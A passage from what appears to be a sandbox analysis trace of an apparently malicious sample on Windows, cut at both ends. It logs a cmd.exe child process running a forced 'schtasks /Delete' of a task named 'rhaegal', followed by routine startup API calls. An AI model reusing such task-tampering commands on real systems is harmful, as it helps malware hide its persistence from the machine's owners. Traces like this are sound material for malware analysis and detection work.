lpUserName="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", dwFlags=0x0) Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x61533000" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x960" cmd_line = "/c schtasks /Delete /F /TN rhaegal" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 400 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 401 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 402 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 403 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 404 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 405 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 406 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 407 start_va = 0x4a5a0000 end_va = 0x4a5ebfff entry_point = 0x4a5a0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 408 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 409 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 410 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 411 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 412 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 413 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 414 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 415 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 416 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 417 start_va = 0x320000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 418 start_va = 0x744a0000 end_va = 0x744a7fff entry_point = 0x744a20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 419 start_va = 0x744b0000 end_va = 0x7450bfff entry_point = 0x744ef798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 420 start_va = 0x74510000 end_va = 0x7454efff entry_point = 0x7453de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 421 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 422 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 423 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 424 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 425 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 426 start_va = 0x74820000 end_va = 0x74826fff entry_point = 0x74820000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 427 start_va = 0x74ac0000 end_va = 0x74acbfff entry_point = 0x74ac10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 428 start_va = 0x74ad0000 end_va = 0x74b2ffff entry_point = 0x74aea3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 429 start_va = 0x74ca0000 end_va = 0x74d9ffff entry_point = 0x74cbb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 430 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 431 start_va = 0x74e80000 end_va = 0x74e98fff entry_point = 0x74e84975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 432 start_va = 0x74ea0000 end_va = 0x74f3ffff entry_point = 0x74eb49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 433 start_va = 0x75ee0000 end_va = 0x75fcffff entry_point = 0x75ef0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 434 start_va = 0x763f0000 end_va = 0x7647ffff entry_point = 0x76406343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 435 start_va = 0x76510000 end_va = 0x765acfff entry_point = 0x76543fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 436 start_va = 0x765b0000 end_va = 0x765f5fff entry_point = 0x765b7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 437 start_va = 0x76600000 end_va = 0x7670ffff entry_point = 0x766132d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 438 start_va = 0x76a40000 end_va = 0x76aebfff entry_point = 0x76a4a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 439 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x0 region_type = private name = "private_0x0000000076b70000" filename = "" Region: id = 440 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x0 region_type = private name = "private_0x0000000076c70000" filename = "" Region: id = 441 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 442 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 443 start_va = 0x5d0000 end_va = 0x757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 444 start_va = 0x74b30000 end_va = 0x74b8ffff entry_point = 0x74b4158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 445 start_va = 0x74db0000 end_va = 0x74e7bfff entry_point = 0x74db168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 446 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 447 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 448 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 449 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 450 start_va = 0x760000 end_va = 0x8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 451 start_va = 0x8f0000 end_va = 0x1ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 452 start_va = 0x1cf0000 end_va = 0x2032fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cf0000" filename = "" Region: id = 453 start_va = 0x2040000 end_va = 0x230efff entry_point = 0x2040000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 4 os_tid = 0x978 [0015.395] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afd1c | out: lpSystemTimeAsFileTime=0x1afd1c*(dwLowDateTime=0x428e5db0, dwHighDateTime=0x1d34da4)) [0015.395] GetCurrentProcessId () returned 0x974 [0015.395] GetCurrentThreadId () returned 0x978 [0015.395] GetTickCount () returned 0x13976 [0015.395] QueryPerformanceCounter (in: lpPerformanceCount=0x1afd14 | out: lpPerformanceCount=0x1afd14*=308023623) returned 1 [0015.396] GetModuleHandleA (lpModuleName=0x0) returned 0x4a5a0000 [0015.396] __set_app_type (_Type=0x1) [0015.396] __p__fmode () returned 0x76ae31f4 [0015.399] __p__commode () returned 0x76ae31fc [0015.399] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5c21a6) returned 0x0 [0015.399] __getmainargs (in: _Argc=0x4a5c4238, _Argv=0x4a5c4240, _Env=0x4a5c423c, _DoWildCard=0, _StartInfo=0x4a5c4140 | out: _Argc=0x4a5c4238, _Argv=0x4a5c4240, _Env=0x4a5c423c) returned 0 [0015.399] GetCurrentThreadId () returned 0x978 [0015.399] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x978) returned 0x60 [0015.399] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0015.399] GetProcAddress (hModule=0x76600000, lpProcName="SetThreadUILanguage") returned 0x7662a84f [0015.399] SetThreadUILanguage (LangId=0x0) returned 0x409 [0015.399] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0015.399] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afcac | out: phkResult=0x1afcac*=0x0) returned 0x2 [0015.400] VirtualQuery (in: lpAddress=0x1afce3, lpBuffer=0x1afc7c, dwLength=0x1c | out: lpBuffer=0x1afc7c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0015.400] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afc7c, dwLength=0x1c | out: lpBuffer=0x1afc7c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0015.400] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afc7c, dwLength=0x1c | out: lpBuffer=0x1afc7c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0015.400] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afc7c, dwLength=0x1c | out: lpBuffer=0x1afc7c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0015.400] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afc7c, dwLength=0x1c | out: lpBuffer=0x1afc7c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x39000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0015.400] GetConsoleOutputCP () returned 0x1b5 [0015.400] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5c4260 | out: lpCPInfo=0x4a5c4260) returned 1 [0015.400] SetConsoleCtrlHandler (HandlerRoutine=0x4a5be72a, Add=1) returned 1 [0015.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0015.400] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0015.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0015.400] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5c41ac | out: lpMode=0x4a5c41ac) returned 1 [0015.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0015.400] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0015.400] _get_osfhandle (_FileHandle=0) returned 0x3 [0015.400] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5c41b0 | out: lpMode=0x4a5c41b0) returned 1 [0015.401] _get_osfhandle (_FileHandle=0) returned 0x3 [0015.401] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0015.401] GetEnvironmentStringsW () returned 0x4e1ff8* [0015.401] FreeEnvironmentStringsW (penv=0x4e1ff8) returned 1 [0015.401] GetEnvironmentStringsW () returned 0x4e1ff8* [0015.402] FreeEnvironmentStringsW (penv=0x4e1ff8) returned 1 [0015.402] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec1c | out: phkResult=0x1aec1c*=0x68) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x0, lpData=0x1aec28*=0x0, lpcbData=0x1aec20*=0x1000) returned 0x2 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x4, lpData=0x1aec28*=0x1, lpcbData=0x1aec20*=0x4) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x0, lpData=0x1aec28*=0x1, lpcbData=0x1aec20*=0x1000) returned 0x2 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x4, lpData=0x1aec28*=0x0, lpcbData=0x1aec20*=0x4) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x4, lpData=0x1aec28*=0x40, lpcbData=0x1aec20*=0x4) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x4, lpData=0x1aec28*=0x40, lpcbData=0x1aec20*=0x4) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x0, lpData=0x1aec28*=0x40, lpcbData=0x1aec20*=0x1000) returned 0x2 [0015.402] RegCloseKey (hKey=0x68) returned 0x0 [0015.402] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec1c | out: phkResult=0x1aec1c*=0x68) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x0, lpData=0x1aec28*=0x40, lpcbData=0x1aec20*=0x1000) returned 0x2 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x4, lpData=0x1aec28*=0x1, lpcbData=0x1aec20*=0x4) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x0, lpData=0x1aec28*=0x1, lpcbData=0x1aec20*=0x1000) returned 0x2 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x4, lpData=0x1aec28*=0x0, lpcbData=0x1aec20*=0x4) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x4, lpData=0x1aec28*=0x9, lpcbData=0x1aec20*=0x4) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x4, lpData=0x1aec28*=0x9, lpcbData=0x1aec20*=0x4) returned 0x0 [0015.402] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aec24, lpData=0x1aec28, lpcbData=0x1aec20*=0x1000 | out: lpType=0x1aec24*=0x0, lpData=0x1aec28*=0x9, lpcbData=0x1aec20*=0x1000) returned 0x2 [0015.402] RegCloseKey (hKey=0x68) returned 0x0 [0015.402] time (in: timer=0x0 | out: timer=0x0) returned 0x59f0aad9 [0015.402] srand (_Seed=0x59f0aad9) [0015.402] GetCommandLineW () returned="/c schtasks /Delete /F /TN rhaegal" [0015.402] GetCommandLineW () returned="/c schtasks /Delete /F /TN rhaegal" [0015.403] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5c5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0015.403] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e2000, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0015.403] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5d0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0015.403] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5d0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0015.403] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a5d0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0015.403] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0015.403] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0015.403] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0015.404] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0015.404] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0015.404] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0015.404] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0015.404] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0015.404] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0015.404] GetEnvironmentStringsW () returned 0x4e2210* [0015.404] FreeEnvironmentStringsW (penv=0x4e2210) returned 1 [0015.404] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a5d0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0015.404] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a5d0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0015.404] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0015.404] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0015.404] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0015.404] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0015.404] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0015.404] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0015.404] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0015.404] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0015.404] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af9e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0015.404] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1af9e8, lpFilePart=0x1af9e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1af9e4*="Desktop") returned 0x25 [0015.404] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0015.404] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af764 | out: lpFindFileData=0x1af764) returned 0x4e1e78 [0015.404] FindClose (in: hFindFile=0x4e1e78 | out: hFindFile=0x4e1e78) returned 1 [0015.404] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1af764 | out: lpFindFileData=0x1af764) returned 0x4e1e78 [0015.404] FindClose (in: hFindFile=0x4e1e78 | out: hFindFile=0x4e1e78) returned 1 [0015.405] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0015.405] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1af764 | out: lpFindFileData=0x1af764) returned 0x4e1e78 [0015.405] FindClose (in: hFindFile=0x4e1e78 | out: hFindFile=0x4e1e78) returned 1 [0015.405] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0015.405] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0015.405] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0015.405] GetEnvironmentStringsW () returned 0x4e4080* [0015.405] FreeEnvironmentStringsW (penv=0x4e4080) returned 1 [0015.405] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5c5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0015.406] GetConsoleOutputCP () returned 0x1b5 [0015.406] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5c4260 | out: lpCPInfo=0x4a5c4260) returned 1 [0015.406] GetUserDefaultLCID () returned 0x409 [0015.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a5c4950, cchData=8 | out: lpLCData=":") returned 2 [0015.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afb28, cchData=128 | out: lpLCData="0") returned 2 [0015.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afb28, cchData=128 | out: lpLCData="0") returned 2 [0015.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afb28, cchData=128 | out: lpLCData="1") returned 2 [0015.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a5c4940, cchData=8 | out: lpLCData="/") returned 2 [0015.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a5c4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0015.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a5c4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0015.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a5c4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0015.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a5c4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0015.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a5c4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0015.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a5c4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0015.407] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a5c4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0015.407] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a5c4930, cchData=8 | out: lpLCData=".") returned 2 [0015.407] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a5c4920, cchData=8 | out: lpLCData=",") returned 2 [0015.407] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0015.408] GetConsoleTitleW (in: lpConsoleTitle=0x4e2da8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0015.408] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0015.408] GetProcAddress (hModule=0x76600000, lpProcName="CopyFileExW") returned 0x76633b92 [0015.408] GetProcAddress (hModule=0x76600000, lpProcName="IsDebuggerPresent") returned 0x76614a5d [0015.408] GetProcAddress (hModule=0x76600000, lpProcName="SetConsoleInputExeNameW") returned 0x7662a79d [0015.409] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0015.409] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0015.409] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0015.409] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0015.409] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0015.409] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0015.409] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0015.410] GetConsoleTitleW (in: lpConsoleTitle=0x1af820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0015.410] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0015.410] _wcsicmp (_String1="schtasks", _String2="ERASE") 